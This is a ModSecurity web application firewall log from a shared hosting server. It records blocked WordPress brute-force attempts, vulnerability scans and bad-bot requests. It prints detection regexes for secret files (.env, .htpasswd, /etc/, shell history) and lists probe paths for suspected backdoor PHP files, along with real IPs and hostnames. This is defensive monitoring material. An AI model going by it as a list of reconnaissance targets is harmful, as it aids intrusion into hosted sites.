[Tue May 26 14:44:12.332308 2026] [security2:error] [pid 636820:tid 636999] [client 62.60.130.227:65014] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVkZK_r6oOphPch7B-ObwAAADE"]
[Tue May 26 14:44:12.344768 2026] [security2:error] [pid 636820:tid 637042] [client 216.41.233.188:20619] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVkY6_r6oOphPch7B-OVAAAAFw"], referer: https://anujtradingco.com
[Tue May 26 14:44:12.392380 2026] [security2:error] [pid 636820:tid 636991] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkY6_r6oOphPch7B-OWwAAACk"]
[Tue May 26 14:44:12.723469 2026] [security2:error] [pid 636820:tid 637010] [client 20.197.193.33:55569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/mac.php"] [unique_id "ahVkZK_r6oOphPch7B-OdAAAADw"]
[Tue May 26 14:44:12.723595 2026] [security2:error] [pid 636820:tid 637010] [client 20.197.193.33:55569] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/mac.php"] [unique_id "ahVkZK_r6oOphPch7B-OdAAAADw"]
[Tue May 26 14:44:13.417396 2026] [security2:error] [pid 636820:tid 637051] [client 20.197.193.33:55610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/25d653587fdfd1.php"] [unique_id "ahVkZa_r6oOphPch7B-OkAAAAGU"]
[Tue May 26 14:44:13.417517 2026] [security2:error] [pid 636820:tid 637051] [client 20.197.193.33:55610] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/25d653587fdfd1.php"] [unique_id "ahVkZa_r6oOphPch7B-OkAAAAGU"]
[Tue May 26 14:44:13.516186 2026] [security2:error] [pid 636820:tid 637003] [client 195.178.110.34:39400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_profiler/phpinfo/phpinfo.php"] [unique_id "ahVkZa_r6oOphPch7B-OlwAAADU"]
[Tue May 26 14:44:14.198268 2026] [security2:error] [pid 636820:tid 637011] [client 20.197.193.33:55635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/wefile.php"] [unique_id "ahVkZq_r6oOphPch7B-OsgAAAD0"]
[Tue May 26 14:44:14.198428 2026] [security2:error] [pid 636820:tid 637011] [client 20.197.193.33:55635] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/wefile.php"] [unique_id "ahVkZq_r6oOphPch7B-OsgAAAD0"]
[Tue May 26 14:44:14.235061 2026] [security2:error] [pid 636820:tid 637061] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkZa_r6oOphPch7B-OogAAAG8"]
[Tue May 26 14:44:14.518826 2026] [security2:error] [pid 636820:tid 637041] [client 62.60.130.231:51973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVkZq_r6oOphPch7B-OswAAAFs"], referer: https://www.google.com/
[Tue May 26 14:44:14.845109 2026] [security2:error] [pid 636820:tid 637036] [client 62.60.130.231:58344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVkZq_r6oOphPch7B-OxgAAAFY"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 14:44:15.128400 2026] [security2:error] [pid 636820:tid 637003] [client 20.197.193.33:55615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/casp3.php"] [unique_id "ahVkZ6_r6oOphPch7B-OzQAAADU"]
[Tue May 26 14:44:15.128515 2026] [security2:error] [pid 636820:tid 637003] [client 20.197.193.33:55615] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/casp3.php"] [unique_id "ahVkZ6_r6oOphPch7B-OzQAAADU"]
[Tue May 26 14:44:15.717573 2026] [security2:error] [pid 636820:tid 637066] [client 202.141.83.254:19961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkZ6_r6oOphPch7B-O0gAAAHQ"]
[Tue May 26 14:44:15.718210 2026] [security2:error] [pid 636820:tid 637066] [client 202.141.83.254:19961] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkZ6_r6oOphPch7B-O0gAAAHQ"]
[Tue May 26 14:44:15.837244 2026] [security2:error] [pid 636820:tid 637027] [client 185.191.171.11:17748] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/3/"] [unique_id "ahVkZ6_r6oOphPch7B-O0wAAAE0"]
[Tue May 26 14:44:15.837402 2026] [security2:error] [pid 636820:tid 637027] [client 185.191.171.11:17748] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/3/"] [unique_id "ahVkZ6_r6oOphPch7B-O0wAAAE0"]
[Tue May 26 14:44:16.932564 2026] [security2:error] [pid 636820:tid 636976] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkaK_r6oOphPch7B-O9AAAABo"]
[Tue May 26 14:44:17.163915 2026] [security2:error] [pid 636820:tid 637025] [client 176.65.139.234:56022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "usteve.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVkaa_r6oOphPch7B-PCQAAAEs"]
[Tue May 26 14:44:18.547661 2026] [security2:error] [pid 636820:tid 637027] [client 180.195.74.87:38715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 87.74.195.180.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mahehealthcare.com"] [uri "/xmlrpc.php"] [unique_id "ahVkaq_r6oOphPch7B-PJAAAAE0"]
[Tue May 26 14:44:18.547792 2026] [security2:error] [pid 636820:tid 637027] [client 180.195.74.87:38715] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "mahehealthcare.com"] [uri "/xmlrpc.php"] [unique_id "ahVkaq_r6oOphPch7B-PJAAAAE0"]
[Tue May 26 14:44:18.886698 2026] [security2:error] [pid 636820:tid 637061] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkaq_r6oOphPch7B-PKgAAAG8"]
[Tue May 26 14:44:20.066329 2026] [security2:error] [pid 636820:tid 636913] [remote 95.216.117.13:37182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVka6_r6oOphPch7B-PRQAANVw"]
[Tue May 26 14:44:20.289738 2026] [security2:error] [pid 636820:tid 637016] [client 195.178.110.34:39406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_profiler/phpinfo/phpinfo.php"] [unique_id "ahVkbK_r6oOphPch7B-PTAAAAEI"]
[Tue May 26 14:44:21.211170 2026] [security2:error] [pid 636820:tid 636965] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkbK_r6oOphPch7B-PUwAAAA8"]
[Tue May 26 14:44:23.122158 2026] [security2:error] [pid 636820:tid 636976] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkbq_r6oOphPch7B-PgQAAABo"]
[Tue May 26 14:44:24.471820 2026] [security2:error] [pid 636820:tid 636940] [remote 123.30.233.13:45142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVkcK_r6oOphPch7B-PswAAUHc"]
[Tue May 26 14:44:26.201841 2026] [security2:error] [pid 636820:tid 637057] [client 202.141.83.254:54008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkcq_r6oOphPch7B-P3AAAAGs"]
[Tue May 26 14:44:26.201969 2026] [security2:error] [pid 636820:tid 637057] [client 202.141.83.254:54008] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkcq_r6oOphPch7B-P3AAAAGs"]
[Tue May 26 14:44:26.588408 2026] [security2:error] [pid 636820:tid 636933] [remote 216.73.216.30:11171] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVkcq_r6oOphPch7B-P9AAATnA"]
[Tue May 26 14:44:27.137329 2026] [security2:error] [pid 636820:tid 636966] [client 20.29.64.60:1669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahVkc6_r6oOphPch7B-QAwAAABA"], referer: www.google.com
[Tue May 26 14:44:27.243680 2026] [security2:error] [pid 636820:tid 637010] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkcq_r6oOphPch7B-P_AAAADw"]
[Tue May 26 14:44:27.312472 2026] [core:error] [pid 636820:tid 637032] (104)Connection reset by peer: [client 20.29.64.60:1674] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 14:44:27.621812 2026] [security2:error] [pid 636820:tid 637070] [client 20.29.64.60:1672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVkc6_r6oOphPch7B-QEwAAAHg"], referer: www.google.com
[Tue May 26 14:44:27.720589 2026] [security2:error] [pid 636820:tid 636831] [remote 216.73.216.30:11171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVkc6_r6oOphPch7B-QFwAAfQo"]
[Tue May 26 14:44:27.958240 2026] [security2:error] [pid 636820:tid 637051] [client 14.191.101.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkc6_r6oOphPch7B-QEgAAAGU"]
[Tue May 26 14:44:28.716792 2026] [security2:error] [pid 636820:tid 637043] [client 20.29.64.60:1683] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/bgytbofp.php"] [unique_id "ahVkdK_r6oOphPch7B-QLQAAAF0"], referer: www.google.com
[Tue May 26 14:44:29.452866 2026] [security2:error] [pid 636820:tid 637038] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkda_r6oOphPch7B-QPAAAAFg"]
[Tue May 26 14:44:31.936974 2026] [security2:error] [pid 636820:tid 636878] [remote 5.189.189.33:58034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.189.189.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVkd6_r6oOphPch7B-QyQAAXzk"]
[Tue May 26 14:44:32.825998 2026] [security2:error] [pid 636820:tid 636887] [remote 18.190.7.192:43720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVkeK_r6oOphPch7B-Q7wAADEI"]
[Tue May 26 14:44:33.489411 2026] [security2:error] [pid 636820:tid 637068] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkea_r6oOphPch7B-RAAAAAHY"]
[Tue May 26 14:44:34.237693 2026] [security2:error] [pid 636820:tid 637048] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkea_r6oOphPch7B-RFwAAAGI"]
[Tue May 26 14:44:35.295230 2026] [security2:error] [pid 636820:tid 636975] [client 114.119.128.127:44071] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVke6_r6oOphPch7B-RTgAAABk"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&product_id=135
[Tue May 26 14:44:35.525425 2026] [security2:error] [pid 636820:tid 636982] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVke6_r6oOphPch7B-RPwAAACA"]
[Tue May 26 14:44:36.554107 2026] [security2:error] [pid 636820:tid 636953] [client 202.141.83.254:19832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkfK_r6oOphPch7B-RfQAAAAM"]
[Tue May 26 14:44:36.554240 2026] [security2:error] [pid 636820:tid 636953] [client 202.141.83.254:19832] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkfK_r6oOphPch7B-RfQAAAAM"]
[Tue May 26 14:44:36.704756 2026] [security2:error] [pid 636820:tid 637069] [client 104.168.25.43:0] ModSecurity: Warning. Matched phrase "Exabot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "proxuber.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVkfK_r6oOphPch7B-RhgAAAHc"]
[Tue May 26 14:44:36.705357 2026] [security2:error] [pid 636820:tid 637003] [client 104.168.25.43:43767] ModSecurity: Warning. Matched phrase "Exabot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "proxuber.com"] [uri "/robots.txt"] [unique_id "ahVkfK_r6oOphPch7B-RhAAAADU"]
[Tue May 26 14:44:37.575185 2026] [security2:error] [pid 636820:tid 636971] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkfa_r6oOphPch7B-RlgAAABU"]
[Tue May 26 14:44:38.627327 2026] [security2:error] [pid 636820:tid 636956] [client 20.29.64.60:1672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVkfq_r6oOphPch7B-R3AAAAAY"], referer: www.google.com
[Tue May 26 14:44:38.684869 2026] [security2:error] [pid 636820:tid 636968] [client 20.29.64.60:1677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahVkfq_r6oOphPch7B-R3QAAABI"], referer: www.google.com
[Tue May 26 14:44:39.617721 2026] [security2:error] [pid 636820:tid 636962] [client 154.161.32.97:46563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkf6_r6oOphPch7B-R_AAAAAw"]
[Tue May 26 14:44:39.617996 2026] [security2:error] [pid 636820:tid 636962] [client 154.161.32.97:46563] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkf6_r6oOphPch7B-R_AAAAAw"]
[Tue May 26 14:44:39.731934 2026] [security2:error] [pid 636820:tid 636972] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkf6_r6oOphPch7B-R-AAAABY"]
[Tue May 26 14:44:40.108689 2026] [security2:error] [pid 636820:tid 636845] [remote 74.7.241.58:45564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVkgK_r6oOphPch7B-SGgAAARg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:44:40.205272 2026] [security2:error] [pid 636820:tid 637044] [client 209.59.231.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkgK_r6oOphPch7B-SHQAAAF4"], referer: https://www.anujtradingco.com/
[Tue May 26 14:44:40.381932 2026] [security2:error] [pid 636820:tid 636970] [client 20.12.194.227:13634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVkgK_r6oOphPch7B-SJgAAABQ"]
[Tue May 26 14:44:40.382100 2026] [security2:error] [pid 636820:tid 636970] [client 20.12.194.227:13634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVkgK_r6oOphPch7B-SJgAAABQ"]
[Tue May 26 14:44:40.507974 2026] [security2:error] [pid 636820:tid 636966] [client 20.12.194.227:64956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVkgK_r6oOphPch7B-SKwAAABA"]
[Tue May 26 14:44:40.508073 2026] [security2:error] [pid 636820:tid 636966] [client 20.12.194.227:64956] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVkgK_r6oOphPch7B-SKwAAABA"]
